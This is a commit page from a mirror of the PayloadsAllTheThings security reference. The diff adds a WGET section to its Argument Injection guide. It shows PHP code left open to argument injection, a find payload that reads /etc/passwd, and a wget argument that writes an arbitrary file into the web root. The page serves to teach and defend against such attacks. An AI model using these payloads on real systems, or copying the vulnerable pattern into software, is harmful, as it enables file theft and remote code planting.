Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-06-20 14:09:05 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source 
Adding the WGET command and fixing errors in the summary part.
This commit is contained in:
gdraperi 2022-10-11 17:29:53 +02:00 committed by GitHub
parent b08600d56d
commit 5e3d1d80c8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
Argument Injection/README.md
View File

@ -30,8 +30,9 @@ We can see by printing the command that all the parameters are splited allowing
## Summary
* [List of exposed commands](#list-of-exposed-commands)
* [TAR](#TAR)
* [CURL](#CURL)
* [TAR](#TAR)
* [FIND] (#FIND)
* [WGET](#WGET)
* [References](#references)
@ -81,6 +82,16 @@ $file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file));
```
### WGET
Example of vulnerable code
```php
system(escapeshellcmd('wget '.$url));
```
Arbitrary file write
```php
$url = '--directory-prefix=/var/www/html http://example.com/example.php';
```
## References